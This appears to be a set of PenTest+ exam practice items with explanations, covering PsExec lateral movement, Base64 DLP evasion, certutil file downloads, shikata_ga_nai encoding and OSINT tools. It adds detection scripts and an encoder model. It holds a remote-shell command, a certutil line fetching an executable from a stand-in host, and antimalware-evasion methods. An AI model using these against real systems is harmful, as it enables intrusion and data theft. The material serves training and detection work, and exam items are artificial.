While performing a penetration testing exercise, a tester executes the following command:
PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe
Which of the following best explains what the tester is trying to do?
Answer : B
Lateral Movement with PsExec:
PsExec (Sysinternals) executes processes on remote Windows hosts over SMB: it authenticates to the target's ADMIN$ share, copies its PSEXESVC service binary there, starts it as a service, and relays the launched process's standard input and output back to the operator over named pipes.
Running cmd.exe this way gives the tester an interactive shell on server01.comptia.org in the security context of the authenticating account (or as SYSTEM with the -s switch), which is lateral movement and a staging point for further privilege escalation. The -accepteula switch suppresses the licence prompt that would otherwise hang a non-interactive run.
Why Not Other Options?
A: The command is not a connectivity test; it opens a remote command shell.
C: Transferring the binary is a side effect, not the goal. PsExec does copy PSEXESVC.exe to the target's ADMIN$ share and register it as a service (a noisy artifact: a System log 7045 service-install event and \PSEXESVC named pipes on the target), but the purpose of the command is the remote cmd.exe session.
D: cmd.exe is not being enabled or configured; it is simply the program PsExec launches on the remote host.
CompTIA Pentest+ Reference:
Domain 3.0 (Attacks and Exploits)
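The artifacts mentioned above (the PSEXESVC service install and the PSEXESVC named pipes) are what a defender hunts for after a PsExec run. The following is an added detection example, not part of the original question or of Sysinternals' own tooling; the event lines are constructed samples in a simplified key=value layout that stands in for a System log 7045 record and a Sysmon Event 17 (pipe created) record, and the host names and service name zyx4sdf are invented.

```python
import re

# Key=Value tokens; a value may be double-quoted so it can contain spaces.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# PsExec's stdin/stdout/stderr pipes are named \PSEXESVC-<client>-<pid>-<stream>.
PIPE_RE = re.compile(r"^\\PSEXESVC(?:-|$)", re.IGNORECASE)
# ADMIN$ maps to %SystemRoot%, so a service binary pushed through that share
# lands directly in the Windows directory, not under System32.
ROOT_DROP_RE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)

# Constructed sample events (not real telemetry): System log 7045 service
# installs and Sysmon Event 17 pipe-created records, flattened to key=value.
SAMPLE_EVENTS = [
    'EventID=7045 Host=server01 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe StartType="demand start"',
    'EventID=7045 Host=server01 ServiceName=Spooler ImagePath=%SystemRoot%\\System32\\spoolsv.exe StartType="auto start"',
    'EventID=17 Host=server01 Image=C:\\Windows\\PSEXESVC.exe PipeName=\\PSEXESVC-WS01-4412-stdin',
    'EventID=17 Host=server01 Image=C:\\Windows\\System32\\lsass.exe PipeName=\\lsass',
    'EventID=7045 Host=server02 ServiceName=zyx4sdf ImagePath=%SystemRoot%\\zyx4sdf.exe StartType="demand start"',
]


def parse_event(line: str) -> dict:
    """Turn one flattened event line into a dict, dropping value quotes."""
    return {key: value.strip('"') for key, value in KV_RE.findall(line)}


def psexec_indicators(event: dict) -> list:
    """Return the PsExec-style indicators present in a single parsed event."""
    hits = []
    if event.get("EventID") == "7045":
        name = event.get("ServiceName", "").upper()
        path = event.get("ImagePath", "")
        if name == "PSEXESVC" or path.upper().endswith("\\PSEXESVC.EXE"):
            hits.append("default PsExec service (PSEXESVC) installed")
        elif ROOT_DROP_RE.match(path) and "demand" in event.get("StartType", "").lower():
            # Renamed PsExec (-r) and PsExec clones keep the same shape:
            # an on-demand service whose binary sits in the ADMIN$ root.
            hits.append("on-demand service binary dropped in %SystemRoot% root via ADMIN$ (renamed PsExec or clone)")
    elif event.get("EventID") == "17" and PIPE_RE.match(event.get("PipeName", "")):
        hits.append("PSEXESVC named pipe created")
    return hits


def detect_psexec(lines: list) -> list:
    """Scan event lines and return (host, indicator) pairs."""
    findings = []
    for line in lines:
        event = parse_event(line)
        for hit in psexec_indicators(event):
            findings.append((event.get("Host", "?"), hit))
    return findings


if __name__ == "__main__":
    for host, hit in detect_psexec(SAMPLE_EVENTS):
        print(f"{host}: {hit}")
```

Run against the samples, the scanner flags the PSEXESVC service install and pipe on server01 and the renamed on-demand service on server02, while leaving the Spooler and lsass records alone. The renamed-service rule is the important one for a tester to know about: using -r to rename the service removes the PSEXESVC string but not the "service binary written to the ADMIN$ root" pattern.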
Which of the following techniques is the best way to avoid detection by data loss prevention tools?
Answer : A
Encoding to Evade DLP:
Encoding (for example Base64) transforms data into a representation that a DLP tool's content rules may not match.
DLP policies typically key on patterns in cleartext (keywords, regular expressions for card or identity numbers, file signatures); a Base64 string carries the same information but none of those patterns, so a scanner that does not decode before matching sees nothing sensitive.
Caveat: mature DLP products decode common encodings and unpack archives before inspection, so simple Base64 only defeats naive pattern matching, and a large opaque blob in an outbound message can itself be flagged as suspicious.
Why Not Other Options?
B (Compression): Compression shrinks the file, but DLP engines routinely decompress archives to inspect their contents, so it does not hide the data.
C (Encryption): DLP cannot read encrypted content, but it can still recognise that a file is encrypted (unreadable high-entropy data, password-protected archives), and many policies block such transfers outright for exactly that reason.
D (Obfuscation): Obfuscation hides the intent of code; encoding is the more direct way to take the data out of the form the pattern matcher expects.
CompTIA Pentest+ Reference:
Domain 3.0 (Attacks and Exploits)
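To make the "pattern rules miss encoded data" point concrete, here is an added example (not part of the original question) that implements a minimal card-number rule the way a DLP engine would, then runs it both as a naive scanner and as one that decodes Base64-looking runs before matching. The messages are constructed; 4111 1111 1111 1111 is a well-known test card number, and the depth limit on decoding is an assumption made here to show that nested encoding pushes the data past whatever depth a product inspects.

```python
import base64
import re

# 16-digit card number, digits optionally separated by spaces or dashes.
CARD_RE = re.compile(r"\b(?:\d[ -]?){15}\d\b")
# A run that looks like Base64: 16+ alphabet characters plus optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, so random 16-digit runs do not trigger the rule."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_cards(text: str) -> list:
    """The pattern rule a DLP engine applies to cleartext."""
    hits = []
    for match in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group())
        if luhn_ok(digits):
            hits.append(digits)
    return hits


def naive_dlp(text: str) -> list:
    """Scanner that only matches patterns in the bytes it is given."""
    return find_cards(text)


def decoding_dlp(text: str, depth: int = 2) -> list:
    """Scanner that also decodes Base64-looking runs, up to `depth` layers deep."""
    hits = find_cards(text)
    if depth == 0:
        return hits
    for match in B64_RE.finditer(text):
        try:
            decoded = base64.b64decode(match.group(), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text once decoded
        hits.extend(decoding_dlp(decoded, depth - 1))
    return hits


# Constructed sample messages carrying the same secret in three forms.
SECRET = b"card=4111111111111111"
PLAIN_MESSAGE = "Invoice paid with card 4111 1111 1111 1111, thanks"
ENCODED_MESSAGE = "see attached: " + base64.b64encode(SECRET).decode()
DOUBLE_ENCODED_MESSAGE = "blob " + base64.b64encode(base64.b64encode(SECRET)).decode()

if __name__ == "__main__":
    for label, msg in [("plain", PLAIN_MESSAGE), ("base64", ENCODED_MESSAGE), ("base64x2", DOUBLE_ENCODED_MESSAGE)]:
        print(f"{label:9} naive={naive_dlp(msg)} decoding(depth=1)={decoding_dlp(msg, 1)} decoding(depth=2)={decoding_dlp(msg, 2)}")
```

The naive scanner catches the cleartext message and nothing else; the decoding scanner catches the single-encoded message, and the double-encoded one only if its decode depth is at least 2. That is the whole mechanism behind the answer, and also its limit: the technique works against the rule set, not against a product that normalises content first.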
A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?
Answer : B
Certutil.exe for File Downloads:
certutil.exe is a native, Microsoft-signed Windows utility for managing certificates and certificate services. Among its many switches, -urlcache -f fetches a URL into the local URL cache and -split writes the fetched content out to a file, which turns it into a living-off-the-land download tool.
Example command:
certutil.exe -urlcache -split -f http://example.com/file.exe file.exe
Because it is already present and trusted on every Windows system, it raises fewer flags than dropping a new, unsigned downloader. This is a relative advantage only: certutil download abuse is documented in LOLBAS and widely signatured, command-line logging (Security 4688 or Sysmon Event 1) shows the -urlcache -f switches plainly, and the download leaves an entry in the user's URL cache that certutil -urlcache lists.
Why Not Other Options?
A (netsh.exe): Used for network configuration (interfaces, firewall rules, port proxies); it has no download capability.
C (nc.exe): Netcat is not native to Windows and would have to be brought onto the system first, which is exactly the kind of drop the tester is trying to avoid.
D (cmdkey.exe): Manages stored credentials; it cannot download files.
CompTIA Pentest+ Reference:
Domain 3.0 (Attacks and Exploits)
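The command-line artifacts described above are what a detection rule keys on. The following is an added example, not from the original question and not Microsoft's or LOLBAS's code: it classifies constructed process-creation records (flattened to key=value, with invented host and user names) and flags certutil invocations that download from a URL or decode a Base64 file, while ignoring a bare certutil -urlcache listing and unrelated binaries.

```python
import re
from typing import Optional

# Key=Value tokens; a value may be double-quoted so it can contain spaces.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed process-creation records (not real telemetry), with the
# full command line quoted as Security 4688 / Sysmon Event 1 would carry it.
SAMPLE_PROCESSES = [
    'Host=ws01 User=jdoe Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil.exe -urlcache -split -f http://example.com/file.exe file.exe"',
    'Host=ws01 User=jdoe Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -decode payload.b64 payload.exe"',
    'Host=ws02 User=svc_pki Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -urlcache"',
    'Host=ws02 User=admin Image=C:\\Windows\\System32\\netsh.exe CommandLine="netsh advfirewall show allprofiles"',
]


def parse_event(line: str) -> dict:
    """Turn one flattened event line into a dict, dropping value quotes."""
    return {key: value.strip('"') for key, value in KV_RE.findall(line)}


def classify_certutil(cmdline: str) -> Optional[str]:
    """Describe the suspicious use of certutil in a command line, or None."""
    args = cmdline.split()
    lowered = [a.lower() for a in args]
    url = URL_RE.search(cmdline)
    # -urlcache on its own lists the cache; with -f and a URL it fetches.
    if "-urlcache" in lowered and "-f" in lowered and url:
        return f"download: {url.group()}"
    # -decode turns a Base64 text file into a binary: classic payload staging.
    if "-decode" in lowered and len(args) >= 3:
        return f"base64 decode of {args[-2]}"
    return None


def detect_certutil_abuse(lines: list) -> list:
    """Return (host, user, verdict) for each suspicious certutil process."""
    findings = []
    for line in lines:
        event = parse_event(line)
        image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image != "certutil.exe":
            continue
        verdict = classify_certutil(event.get("CommandLine", ""))
        if verdict:
            findings.append((event.get("Host", "?"), event.get("User", "?"), verdict))
    return findings


if __name__ == "__main__":
    for host, user, verdict in detect_certutil_abuse(SAMPLE_PROCESSES):
        print(f"{host} {user}: {verdict}")
```

Only the two ws01 records are reported. The rule deliberately requires both -urlcache and -f plus a URL, because the listing form of -urlcache is legitimate administrative use and matching on the switch alone would be noisy.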
During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?
Answer : A
API as a Target:
APIs (Application Programming Interfaces) are common assets to test for vulnerabilities such as improper authentication, data leakage, or injection attacks.
Testing APIs often uncovers critical issues in modern applications.
Why Not Other Options?
B (HTTP): A protocol, not an asset; the web application or API served over HTTP would be the asset.
C (IPA): Not a testable asset in this context; if it is meant as an iOS application package (.ipa), that is a build artifact the client would hand over for a mobile test, not something identified while scoping targets.
D (ICMP): A protocol used for network diagnostics (ping, traceroute), not an application asset.
CompTIA Pentest+ Reference:
Domain 1.0 (Planning and Scoping)
A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?
Answer : A
Using shikata_ga_nai:
The command encodes the payload with x86/shikata_ga_nai, Metasploit's polymorphic XOR additive-feedback encoder: each run picks a random key, so the encoded payload body contains no fixed byte sequence for a static antimalware signature to match, and a small decoder stub prepended to the payload restores it in memory at run time.
The payload is a Windows bind shell (windows/bind_tcp), which listens on the target and lets the tester connect in for shell access. Note that shikata_ga_nai is an x86 (32-bit) encoder; msfvenom will not apply it to a windows/x64 payload, so this option only fits a 32-bit target process.
Caveat: the decoder stub itself is well known and heavily signatured, and in-memory or behavioural scanning sees the decoded payload, so this is a legacy evasion technique with limited effect against modern endpoint protection.
Why Not Other Options?
B, C: These commands generate a payload without an encoder, leaving the raw, signatured shellcode for antimalware to match.
D: This command does not generate shellcode at all; it appears to manipulate user accounts.
CompTIA Pentest+ Reference:
Domain 3.0 (Attacks and Exploits)
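Why an encoded payload has no stable signature is easier to see with the transformation written out. The following is an added example (not part of the original question, and not Metasploit's own code): it models the XOR additive-feedback scheme that x86/shikata_ga_nai's decoder loop performs, XORing each 32-bit word with a running key and then adding the decoded word into the key. The real encoder additionally randomises the ordering and register choice of the decoder stub and uses an FPU instruction to find its own address; that stub is the part signatures target. The payload bytes here are a constructed stand-in (a NOP sled plus a string), not executable shellcode.

```python
import struct

MASK = 0xFFFFFFFF


def xaf_encode(payload: bytes, key: int) -> bytes:
    """XOR each 32-bit word with the running key, then feed the cleartext
    word back into the key (additive feedback). Short payloads are
    zero-padded to a whole number of words, as an encoder would."""
    padded = payload + b"\x00" * (-len(payload) % 4)
    out = bytearray()
    for offset in range(0, len(padded), 4):
        word = struct.unpack_from("<I", padded, offset)[0]
        out += struct.pack("<I", word ^ key)
        key = (key + word) & MASK
    return bytes(out)


def xaf_decode(encoded: bytes, key: int) -> bytes:
    """What the decoder stub does at run time: undo the XOR word by word,
    updating the key from the word it just recovered."""
    out = bytearray()
    for offset in range(0, len(encoded), 4):
        word = struct.unpack_from("<I", encoded, offset)[0] ^ key
        out += struct.pack("<I", word)
        key = (key + word) & MASK
    return bytes(out)


# Constructed stand-in for shellcode: a NOP sled plus a string a naive
# signature might key on. It is not executable code.
PAYLOAD = b"\x90\x90\x90\x90cmd.exe\x00"
SIGNATURE = b"cmd.exe"


def signature_present(blob: bytes) -> bool:
    """The static check an antimalware engine might run on the bytes."""
    return SIGNATURE in blob


def roundtrip_ok(payload: bytes, key: int) -> bool:
    """Encoding then decoding with the same key must give the payload back."""
    return xaf_decode(xaf_encode(payload, key), key)[: len(payload)] == payload


if __name__ == "__main__":
    for key in (0x12345678, 0xDEADBEEF):
        enc = xaf_encode(PAYLOAD, key)
        print(f"key={key:#010x} encoded={enc.hex()} signature={signature_present(enc)} roundtrip={roundtrip_ok(PAYLOAD, key)}")
```

Two keys give two entirely different encoded bodies, neither containing the signature string, and both decode back to the original. Because the key is the only thing that varies, the same feedback logic must be carried in the decoder stub in front of the payload, which is why the stub, not the body, is what detection focuses on.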
Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?
Answer : D
DREAD for Threat Modeling:
DREAD is a risk-rating model used in threat modeling. Each identified threat is scored on Damage potential, Reproducibility, Exploitability, Affected users and Discoverability (the initials give the name), and the combined score ranks which threats to address or test first.
PTES (the Penetration Testing Execution Standard) is a methodology for running an engagement end to end; it tells the tester how to structure the test, not how to rate and rank individual threats. A tester who needs to build and prioritise a threat model during planning therefore reaches for DREAD.
Why Not Other Options?
A, B, C: DREAD can be applied to web, mobile or thick-client applications alike, but none of those target types is the reason to choose it; its purpose is threat modeling, which a testing methodology such as PTES does not provide.
CompTIA Pentest+ Reference:
Domain 1.0 (Planning and Scoping)
During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?
Answer : D
Censys.io:
Censys is a search engine built from continuous internet-wide scans. For a host it reports the open ports and service banners it observed (protocol and software details), together with the IP's autonomous system and GeoIP location, which is exactly the combined service summary and geolocation the analyst wants, obtained without sending a packet from the analyst's own address.
Why Not Other Options?
A (WiGLE.net): A crowd-sourced database of Wi-Fi access point locations; it holds no data about internet-facing services.
B (WHOIS): Returns registrant, registrar and contact details for a domain or IP block; it gives no service summary, and the registrant's postal address is not the host's GeoIP location.
C (theHarvester): Gathers OSINT such as email addresses, subdomains and host names from public sources; on its own it does not produce a service inventory or GeoIP data.
CompTIA Pentest+ Reference:
Domain 2.0 (Information Gathering and Vulnerability Identification)